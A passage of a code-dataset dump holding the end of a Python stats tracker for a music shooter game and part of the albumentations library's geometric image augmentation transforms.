get(self, index: int) -> Stat:\n \"\"\"Return an element from the list at the given index\"\"\"\n return Stat(self.list[index])\n\n def __str__(self) -> str:\n return str(', '.join(self.list))\n\n def __repr__(self) -> str:\n return str(f'ListStat(List={self.list})')\n\n\nclass StatTracker:\n \"\"\"\n Tracks all game information as Stats.\n\n Displays some of these stats at the end DEATH MENU.\n\n Sends relevant stats over OSC at the provided port.\n \"\"\"\n\n OUTPUT_STATS_FORMAT = [\n 'SCORE: {buffer}{value}',\n 'ENEMIES KILLED: {buffer}{value}',\n 'PLAYER ACCURACY: {buffer}{value}%',\n 'PLAYER HEALTH LOST: {buffer}{value}',\n 'NOTES RECOVERED: {buffer}{value}',\n 'UPGRADES PICKED UP: {buffer}{value}',\n 'TIME SURVIVED: {buffer}{value}',\n 'TOTAL TIME PLAYED: {buffer}{value}',\n ]\n\n def __init__(self, osc: OSCHandler) -> None:\n self.osc = osc\n\n # Stats that track throughout each playthrough\n self.control__max_init = Stat(0)\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__max_quit = Stat(0)\n self.control__output_device = TextStat()\n self.control__fps = Stat(FPS)\n self.control__num_voices = Stat(NUM_VOICES)\n self.control__screen_width = Stat(SCREEN_WIDTH)\n self.control__screen_height = Stat(SCREEN_HEIGHT)\n self.control__record_music = Stat(RECORD_MUSIC)\n\n self.game__play_count = Stat(0)\n self.game__time__total_played = TimeStat(0)\n\n def init_new_playthrough(self, start_time_ms: int = 0, player_max_health: int = 0):\n \"\"\"Reset Stats on a new Playthrough\"\"\"\n\n # Time trackers\n self.start_time = start_time_ms\n self.time_last_enemy_killed = start_time_ms\n self.time_player_last_hit = start_time_ms\n self.time_last_collected_note = start_time_ms\n\n self.control__game_init = Stat(0)\n self.control__menu_init = Stat(0)\n self.control__reset_music = Stat(0)\n\n self.game__score = Stat(0)\n self.game__total_frames = Stat(0)\n self.game__time__current_playthrough = TimeStat(0)\n self.game__num_events = Stat(0)\n self.game__percent__note_over_enemy_score = Stat(50.)\n\n self.player__starting_position = ListStat(initial_length=2)\n self.player__starting_angle = Stat(0)\n self.player__position = ListStat(initial_length=2)\n self.player__vertical_half = TextStat()\n self.player__horizontal_half = TextStat()\n self.player__frames__moving_and_rotating = Stat(0)\n self.player__frames__moving = Stat(0)\n self.player__frames__still = Stat(0)\n self.player__frames__rotating = Stat(0)\n self.player__frames__firing = Stat(0)\n self.player__frames__per_screen_quadrant = ListStat(initial_length=4)\n self.player__frames__per_angle_quadrant = ListStat(initial_length=4)\n self.player__percent__firing_weapon = Stat(0.)\n self.player__percent__moving_over_rotating = Stat(50.)\n self.player__percent__moving_and_rotating = Stat(50.)\n self.player__percent__health_lost_over_gained = Stat(50.)\n self.player__percent__dodges_over_enemy_collision = Stat(50.)\n self.player__percent__hit_rests_over_accidentals = Stat(50.)\n self.player__percent__missed_notes_over_dodges = Stat(50.)\n self.player__curr_velocity = ListStat(initial_length=2)\n self.player__curr_speed = Stat(0)\n self.player__angle = Stat(0)\n self.player__last_rotation_direction = Stat(0)\n self.player__percent__accuracy = Stat(0.0)\n self.player__time__between_kills = TrackerStat()\n self.player__time__between_getting_hit = TrackerStat()\n self.player__max_health = Stat(player_max_health)\n self.player__curr_health = Stat(player_max_health)\n self.player__health_lost = Stat(0)\n self.player__health_gained = Stat(0)\n self.player__projectile_hit_count = CounterStat(PROJECTILE_TYPES)\n self.player__hit_distance = TrackerStat()\n self.player__enemies_collided = Stat(0)\n self.player__dodges = Stat(0)\n self.player__missed_nearby_notes = Stat(0)\n self.player__alive_projectiles = Stat(0)\n\n self.notes__collected = Stat(0)\n self.notes__total = Stat(0)\n self.notes__score = Stat(0)\n self.notes__time__between_collecting = TrackerStat()\n self.notes__time__lifespan = TrackerStat()\n self.notes__percent__collected = Stat(0)\n\n self.weapon__selected = Stat(0)\n self.weapon__total_shots_fired = Stat(0)\n self.weapon__shots_per_weapon = ListStat(initial_length=2)\n self.weapon__hits_per_weapon = ListStat(initial_length=2)\n self.weapon__frames__per_weapon = ListStat(initial_length=2)\n self.weapon__percent__one_over_two = Stat(0)\n\n self.upgrades__total_dropped = Stat(0)\n self.upgrades__picked_up = Stat(0)\n self.upgrades__missed = Stat(0)\n self.upgrades__time__between_collecting = TrackerStat()\n self.upgrades__time__lifespan = TrackerStat()\n self.upgrades__percent__collected = Stat(0)\n\n self.enemies__total = Stat(0)\n self.enemies__standard_count = Stat(0)\n self.enemies__special_count = Stat(0)\n self.enemies__num_on_screen = TrackerStat(0)\n self.enemies__hit = Stat(0)\n self.enemies__killed = Stat(0)\n self.enemies__hit_distance = TrackerStat()\n self.enemies__alive_projectiles = Stat(0)\n self.enemies__score = Stat(0)\n self.enemies__time__lifespan = TrackerStat()\n\n self.game__play_count += 1\n\n def send_stats(self):\n \"\"\"Send all stats over OSC\"\"\"\n osc_stats = self.convert_osc_stats_to_dict()\n self.osc.union_bundle(osc_stats)\n if not debug.DISABLE_OSC_SEND:\n self.osc.send_full_bundle()\n\n def update_stats(self):\n \"\"\"Update stats based on other stats\"\"\"\n # Update score\n self.game__score = self.enemies__score + self.notes__score\n\n # Update player accuracy\n if self.weapon__total_shots_fired > 0:\n self.player__percent__accuracy = (self.enemies__hit / self.weapon__total_shots_fired) * 100\n\n # Update player position stats\n horizontal_half = \"left\" if self.player__position.list[0] < SCREEN_WIDTH / 2 else \"right\"\n vertical_half = \"top\" if self.player__position.list[1] < SCREEN_HEIGHT / 2 else \"bottom\"\n self.player__horizontal_half.update(horizontal_half)\n self.player__vertical_half.update(vertical_half)\n\n if vertical_half == \"top\":\n # top left == quadrant 0\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(0, 1)\n # top right == quadrant 1\n else:\n self.player__frames__per_screen_quadrant.add_at_index(1, 1)\n else:\n # bottom left == quadrant 2\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(2, 1)\n # bottom right == quadrant 3\n else:\n self.player__frames__per_screen_quadrant.add_at_index(3, 1)\n\n # Update movement vs rotating vs non-movement ratio\n total = self.player__frames__moving + self.player__frames__rotating\n if total > 0:\n self.player__percent__moving_over_rotating = (self.player__frames__moving / total) * 100\n\n # Update movement and rotating vs just movement or just rotation\n total = self.player__frames__moving + self.player__frames__rotating + self.player__frames__moving_and_rotating\n if total > 0:\n self.player__percent__moving_and_rotating = (self.player__frames__moving_and_rotating / total) * 100\n\n # Update firing vs not ratio\n if self.game__total_frames > 0:\n self.player__percent__firing_weapon = (self.player__frames__firing / self.game__total_frames) * 100\n\n # Upgrade percentage\n if self.upgrades__total_dropped > 0:\n self.upgrades__percent__collected = (self.upgrades__picked_up / self.upgrades__total_dropped) * 100\n\n if self.notes__total > 0:\n self.notes__percent__collected = (self.notes__collected / self.notes__total) * 100\n\n # Update weapon usage\n if self.weapon__total_shots_fired > 0:\n self.weapon__percent__one_over_two = \\\n (self.weapon__shots_per_weapon.get(0) / self.weapon__total_shots_fired) * 100\n\n # Health lost vs gained\n total = self.player__health_lost + self.player__health_gained\n if total > 0:\n self.player__percent__health_lost_over_gained = (self.player__health_lost / total) * 100\n\n # Dodges vs enemy collisions\n total = self.player__dodges + self.player__enemies_collided\n if total > 0:\n self.player__percent__dodges_over_enemy_collision = (self.player__dodges / total) * 100\n\n # Missed notes vs dodges\n total = self.player__missed_nearby_notes + self.player__dodges\n if total > 0:\n self.player__percent__missed_notes_over_dodges = (self.player__missed_nearby_notes / total) * 100\n\n # Rests vs accidentals\n projectile_hit_count = self.player__projectile_hit_count.count\n if projectile_hit_count > 0:\n num_rests = self.player__projectile_hit_count.get(REST)\n self.player__percent__hit_rests_over_accidentals.update((num_rests / projectile_hit_count) * 100)\n\n # Note vs enemy score\n if self.game__score > 0:\n self.game__percent__note_over_enemy_score = (self.notes__score / self.game__score) * 100\n\n def convert_osc_stats_to_dict(self) -> Dict[str, Any]:\n \"\"\"Convert stats into a dictionary to be used by the OSC manager\"\"\"\n stat_dict = {}\n\n for stat_name, stat in self.__dict__.items():\n if not hasattr(stat, 'send') or not stat.send:\n continue\n\n if isinstance(stat, Stat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, TimeStat):\n stat_dict[stat_name] = stat.time\n elif isinstance(stat, TrackerStat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, ListStat):\n stat_dict[stat_name] = stat.list\n elif isinstance(stat, TextStat):\n stat_dict[stat_name] = stat.text\n elif isinstance(stat, CounterStat):\n stat_dict[stat_name] = stat.items\n\n return stat_dict\n\n def set_game_time(self, total_time_elapsed_ms: int):\n \"\"\"Set the time that a new game playthrough begins\"\"\"\n # calculate playthrough time\n playthrough_time_elapsed = total_time_elapsed_ms - self.start_time\n self.game__time__current_playthrough = TimeStat(playthrough_time_elapsed)\n\n # calculate total time\n self.game__time__total_played = TimeStat(total_time_elapsed_ms)\n\n def print_stats(self):\n \"\"\"Print Stats to the console\"\"\"\n print(f'---- Game {self.game__play_count} ----')\n print(f'Score: {self.game__score}')\n print(f'Enemies Killed: {self.enemies__killed}')\n print(f'Enemy shots dodged: {self.player__dodges}')\n print(f'Avg time to kill an Enemy: {self.player__time__between_kills.avg / 1000}')\n print(f'Total Shots Fired: {self.weapon__total_shots_fired}')\n print(f'Enemies Hit: {self.enemies__hit}')\n print(f'Player Shot Accuracy: {self.player__percent__accuracy}%')\n print(\n f'Time Survived: {self.game__time__current_playthrough.hours} Hours, '\n f'{self.game__time__current_playthrough.minutes} Minutes, '\n f'{self.game__time__current_playthrough.seconds} Seconds'\n )\n print(\n f'Total Time Played: {self.game__time__total_played.hours} Hours, '\n f'{self.game__time__total_played.minutes} Minutes, '\n f'{self.game__time__total_played.seconds} Seconds'\n )\n print()\n\n def get_endgame_stats(self) -> str:\n \"\"\"Formats the endgame stats text to be displayed during the DEATH MENU\"\"\"\n stats_to_report = [\n self.game__score,\n self.enemies__killed,\n int(self.player__percent__accuracy.value),\n self.player__health_lost,\n self.notes__collected,\n self.upgrades__picked_up,\n self.game__time__current_playthrough.time_display,\n self.game__time__total_played.time_display,\n ]\n\n # Format lines without buffer\n stats_str_no_buffer = [\n stat_str.format(buffer=0, value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n # Calculate buffer for each line\n longest_line = len(max(stats_str_no_buffer, key=len))\n buffer_per_line = [\n ' ' * (longest_line - len(line)) for line in stats_str_no_buffer\n ]\n\n # Re-format lines with buffer\n stats_str_with_buffer = [\n stat_str.format(buffer=buffer_per_line[idx], value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n return '\\n'.join(stats_str_with_buffer)\n\n\n\nstat_tracker = StatTracker(osc=osc)\n","repo_name":"gloliva/HyperLydian","sub_path":"game/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":22049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"928641809","text":"import math\nimport random\nfrom enum import Enum\nfrom typing import Dict, Optional, Sequence, Tuple, Union\n\nimport cv2\nimport numpy as np\nimport skimage.transform\n\nfrom albumentations.core.bbox_utils import denormalize_bbox, normalize_bbox\n\nfrom ... import random_utils\nfrom ...core.transforms_interface import (\n BoxInternalType,\n DualTransform,\n ImageColorType,\n KeypointInternalType,\n ScaleFloatType,\n to_tuple,\n)\nfrom ..functional import bbox_from_mask\nfrom . import functional as F\n\n__all__ = [\n \"ShiftScaleRotate\",\n \"ElasticTransform\",\n \"Perspective\",\n \"Affine\",\n \"PiecewiseAffine\",\n \"VerticalFlip\",\n \"HorizontalFlip\",\n \"Flip\",\n \"Transpose\",\n \"OpticalDistortion\",\n \"GridDistortion\",\n \"PadIfNeeded\",\n]\n\n\nclass ShiftScaleRotate(DualTransform):\n \"\"\"Randomly apply affine transforms: translate, scale and rotate the input.\n\n Args:\n shift_limit ((float, float) or float): shift factor range for both height and width. If shift_limit\n is a single float value, the range will be (-shift_limit, shift_limit). Absolute values for lower and\n upper bounds should lie in range [0, 1]. Default: (-0.0625, 0.0625).\n scale_limit ((float, float) or float): scaling factor range. If scale_limit is a single float value, the\n range will be (-scale_limit, scale_limit). Note that the scale_limit will be biased by 1.\n If scale_limit is a tuple, like (low, high), sampling will be done from the range (1 + low, 1 + high).\n Default: (-0.1, 0.1).\n rotate_limit ((int, int) or int): rotation range. If rotate_limit is a single int value, the\n range will be (-rotate_limit, rotate_limit). Default: (-45, 45).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n shift_limit_x ((float, float) or float): shift factor range for width. If it is set then this value\n instead of shift_limit will be used for shifting width. If shift_limit_x is a single float value,\n the range will be (-shift_limit_x, shift_limit_x). Absolute values for lower and upper bounds should lie in\n the range [0, 1]. Default: None.\n shift_limit_y ((float, float) or float): shift factor range for height. If it is set then this value\n instead of shift_limit will be used for shifting height. If shift_limit_y is a single float value,\n the range will be (-shift_limit_y, shift_limit_y). Absolute values for lower and upper bounds should lie\n in the range [0, 1]. Default: None.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or \"ellipse\".\n Default: \"largest_box\"\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n shift_limit=0.0625,\n scale_limit=0.1,\n rotate_limit=45,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n shift_limit_x=None,\n shift_limit_y=None,\n rotate_method=\"largest_box\",\n always_apply=False,\n p=0.5,\n ):\n super(ShiftScaleRotate, self).__init__(always_apply, p)\n self.shift_limit_x = to_tuple(shift_limit_x if shift_limit_x is not None else shift_limit)\n self.shift_limit_y = to_tuple(shift_limit_y if shift_limit_y is not None else shift_limit)\n self.scale_limit = to_tuple(scale_limit, bias=1.0)\n self.rotate_limit = to_tuple(rotate_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.rotate_method = rotate_method\n\n if self.rotate_method not in [\"largest_box\", \"ellipse\"]:\n raise ValueError(f\"Rotation method {self.rotate_method} is not valid.\")\n\n def apply(self, img, angle=0, scale=0, dx=0, dy=0, interpolation=cv2.INTER_LINEAR, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img, angle=0, scale=0, dx=0, dy=0, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_keypoint(self, keypoint, angle=0, scale=0, dx=0, dy=0, rows=0, cols=0, **params):\n return F.keypoint_shift_scale_rotate(keypoint, angle, scale, dx, dy, rows, cols)\n\n def get_params(self):\n return {\n \"angle\": random.uniform(self.rotate_limit[0], self.rotate_limit[1]),\n \"scale\": random.uniform(self.scale_limit[0], self.scale_limit[1]),\n \"dx\": random.uniform(self.shift_limit_x[0], self.shift_limit_x[1]),\n \"dy\": random.uniform(self.shift_limit_y[0], self.shift_limit_y[1]),\n }\n\n def apply_to_bbox(self, bbox, angle, scale, dx, dy, **params):\n return F.bbox_shift_scale_rotate(bbox, angle, scale, dx, dy, self.rotate_method, **params)\n\n def get_transform_init_args(self):\n return {\n \"shift_limit_x\": self.shift_limit_x,\n \"shift_limit_y\": self.shift_limit_y,\n \"scale_limit\": to_tuple(self.scale_limit, bias=-1.0),\n \"rotate_limit\": self.rotate_limit,\n \"interpolation\": self.interpolation,\n \"border_mode\": self.border_mode,\n \"value\": self.value,\n \"mask_value\": self.mask_value,\n \"rotate_method\": self.rotate_method,\n }\n\n\nclass ElasticTransform(DualTransform):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n Based on https://gist.github.com/ernestum/601cdf56d2b424757de5\n\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Args:\n alpha (float):\n sigma (float): Gaussian filter parameter.\n alpha_affine (float): The range will be (-alpha_affine, alpha_affine)\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n approximate (boolean): Whether to smooth displacement map with fixed kernel size.\n Enabling this option gives ~2X speedup on large images.\n same_dxdy (boolean): Whether to use same random generated shift for x and y.\n Enabling this option gives ~2X speedup.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n alpha=1,\n sigma=50,\n alpha_affine=50,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n always_apply=False,\n approximate=False,\n same_dxdy=False,\n p=0.5,\n ):\n super(ElasticTransform, self).__init__(always_apply, p)\n self.alpha = alpha\n self.alpha_affine = alpha_affine\n self.sigma = sigma\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.approximate = approximate\n self.same_dxdy = same_dxdy\n\n def apply(self, img, random_state=None, interpolation=cv2.INTER_LINEAR, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n interpolation,\n self.border_mode,\n self.value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_mask(self, img, random_state=None, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_bbox(self, bbox, random_state=None, **params):\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.elastic_transform(\n mask,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\"random_state\": random.randint(0, 10000)}\n\n def get_transform_init_args_names(self):\n return (\n \"alpha\",\n \"sigma\",\n \"alpha_affine\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n \"approximate\",\n \"same_dxdy\",\n )\n\n\nclass Perspective(DualTransform):\n \"\"\"Perform a random four point perspective transform of the input.\n\n Args:\n scale (float or (float, float)): standard deviation of the normal distributions. These are used to sample\n the random distances of the subimage's corners from the full image's corners.\n If scale is a single float value, the range will be (0, scale). Default: (0.05, 0.1).\n keep_size (bool): Whether to resize image’s back to their original size after applying the perspective\n transform. If set to False, the resulting images may end up having different shapes\n and will always be a list, never an array. Default: True\n pad_mode (OpenCV flag): OpenCV border mode.\n pad_val (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n Default: 0\n mask_pad_val (int, float, list of int, list of float): padding value for mask\n if border_mode is cv2.BORDER_CONSTANT. Default: 0\n fit_output (bool): If True, the image plane size and position will be adjusted to still capture\n the whole image after perspective transformation. (Followed by image resizing if keep_size is set to True.)\n Otherwise, parts of the transformed image may be outside of the image plane.\n This setting should not be set to True when using large scale values as it could lead to very large images.\n Default: False\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n scale=(0.05, 0.1),\n keep_size=True,\n pad_mode=cv2.BORDER_CONSTANT,\n pad_val=0,\n mask_pad_val=0,\n fit_output=False,\n interpolation=cv2.INTER_LINEAR,\n always_apply=False,\n p=0.5,\n ):\n super().__init__(always_apply, p)\n self.scale = to_tuple(scale, 0)\n self.keep_size = keep_size\n self.pad_mode = pad_mode\n self.pad_val = pad_val\n self.mask_pad_val = mask_pad_val\n self.fit_output = fit_output\n self.interpolation = interpolation\n\n def apply(self, img, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective(\n img, matrix, max_width, max_height, self.pad_val, self.pad_mode, self.keep_size, params[\"interpolation\"]\n )\n\n def apply_to_bbox(self, bbox, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_bbox(bbox, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size)\n\n def apply_to_keypoint(self, keypoint, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_keypoint(\n keypoint, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n scale = random_utils.uniform(*self.scale)\n points = random_utils.normal(0, scale, [4, 2])\n points = np.mod(np.abs(points), 1)\n\n # top left -- no changes needed, just use jitter\n # top right\n points[1, 0] = 1.0 - points[1, 0] # w = 1.0 - jitter\n # bottom right\n points[2] = 1.0 - points[2] # w = 1.0 - jitt\n # bottom left\n points[3, 1] = 1.0 - points[3, 1] # h = 1.0 - jitter\n\n points[:, 0] *= w\n points[:, 1] *= h\n\n # Obtain a consistent order of the points and unpack them individually.\n # Warning: don't just do (tl, tr, br, bl) = _order_points(...)\n # here, because the reordered points is used further below.\n points = self._order_points(points)\n tl, tr, br, bl = points\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n min_width = None\n max_width = None\n while min_width is None or min_width < 2:\n width_top = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n width_bottom = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n max_width = int(max(width_top, width_bottom))\n min_width = int(min(width_top, width_bottom))\n if min_width < 2:\n step_size = (2 - min_width) / 2\n tl[0] -= step_size\n tr[0] += step_size\n bl[0] -= step_size\n br[0] += step_size\n\n # compute the height of the new image, which will be the maximum distance between the top-right\n # and bottom-right y-coordinates or the top-left and bottom-left y-coordinates\n min_height = None\n max_height = None\n while min_height is None or min_height < 2:\n height_right = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n height_left = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n max_height = int(max(height_right, height_left))\n min_height = int(min(height_right, height_left))\n if min_height < 2:\n step_size = (2 - min_height) / 2\n tl[1] -= step_size\n tr[1] -= step_size\n bl[1] += step_size\n br[1] += step_size\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left order\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n dst = np.array([[0, 0], [max_width, 0], [max_width, max_height], [0, max_height]], dtype=np.float32)\n\n # compute the perspective transform matrix and then apply it\n m = cv2.getPerspectiveTransform(points, dst)\n\n if self.fit_output:\n m, max_width, max_height = self._expand_transform(m, (h, w))\n\n return {\"matrix\": m, \"max_height\": max_height, \"max_width\": max_width, \"interpolation\": self.interpolation}\n\n @classmethod\n def _expand_transform(cls, matrix, shape):\n height, width = shape\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2, max_height\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n rect = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n dst = cv2.perspectiveTransform(np.array([rect]), matrix)[0]\n\n # get min x, y over transformed 4 points\n # then modify target points by subtracting these minima => shift to (0, 0)\n dst -= dst.min(axis=0, keepdims=True)\n dst = np.around(dst, decimals=0)\n\n matrix_expanded = cv2.getPerspectiveTransform(rect, dst)\n max_width, max_height = dst.max(axis=0)\n return matrix_expanded, int(max_width), int(max_height)\n\n @staticmethod\n def _order_points(pts: np.ndarray) -> np.ndarray:\n pts = np.array(sorted(pts, key=lambda x: x[0]))\n left = pts[:2] # points with smallest x coordinate - left points\n right = pts[2:] # points with greatest x coordinate - right points\n\n if left[0][1] < left[1][1]:\n tl, bl = left\n else:\n bl, tl = left\n\n if right[0][1] < right[1][1]:\n tr, br = right\n else:\n br, tr = right\n\n return np.array([tl, tr, br, bl], dtype=np.float32)\n\n def get_transform_init_args_names(self):\n return \"scale\", \"keep_size\", \"pad_mode\", \"pad_val\", \"mask_pad_val\", \"fit_output\", \"interpolation\"\n\n\nclass Affine(DualTransform):\n \"\"\"Augmentation to apply affine transformations to images.\n This is mostly a wrapper around the corresponding classes and functions in OpenCV.\n\n Affine transformations involve:\n\n - Translation (\"move\" image on the x-/y-axis)\n - Rotation\n - Scaling (\"zoom\" in/out)\n - Shear (move one side of the image, turning a square into a trapezoid)\n\n All such transformations can create \"new\" pixels in the image without a defined content, e.g.\n if the image is translated to the left, pixels are created on the right.\n A method has to be defined to deal with these pixel values.\n The parameters `cval` and `mode` of this class deal with this.\n\n Some transformations involve interpolations between several pixels\n of the input image to generate output pixel values. The parameters `interpolation` and\n `mask_interpolation` deals with the method of interpolation used for this.\n\n Args:\n scale (number, tuple of number or dict): Scaling factor to use, where ``1.0`` denotes \"no change\" and\n ``0.5`` is zoomed out to ``50`` percent of the original size.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That the same range will be used for both x- and y-axis. To keep the aspect ratio, set\n ``keep_ratio=True``, then the same value will be used for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes. Note that when\n the ``keep_ratio=True``, the x- and y-axis ranges should be the same.\n translate_percent (None, number, tuple of number or dict): Translation as a fraction of the image height/width\n (x-translation, y-translation), where ``0`` denotes \"no change\"\n and ``0.5`` denotes \"half of the axis size\".\n * If ``None`` then equivalent to ``0.0`` unless `translate_px` has a value other than ``None``.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That sampled fraction value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_px (None, int, tuple of int or dict): Translation in pixels.\n * If ``None`` then equivalent to ``0`` unless `translate_percent` has a value other than ``None``.\n * If a single int, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from\n the discrete interval ``[a..b]``. That number will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n rotate (number or tuple of number): Rotation in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``. Rotation happens around the *center* of the image,\n not the top left corner as in some other frameworks.\n * If a number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``\n and used as the rotation value.\n shear (number, tuple of number or dict): Shear in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``, with reasonable values being in the range of ``[-45, 45]``.\n * If a number, then that value will be used for all images as\n the shear on the x-axis (no shear on the y-axis will be done).\n * If a tuple ``(a, b)``, then two value will be uniformly sampled per image\n from the interval ``[a, b]`` and be used as the x- and y-shear value.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n interpolation (int): OpenCV interpolation flag.\n mask_interpolation (int): OpenCV interpolation flag.\n cval (number or sequence of number): The constant value to use when filling in newly created pixels.\n (E.g. translating by 1px to the right will create a new 1px-wide column of pixels\n on the left of the image).\n The value is only used when `mode=constant`. The expected value range is ``[0, 255]`` for ``uint8`` images.\n cval_mask (number or tuple of 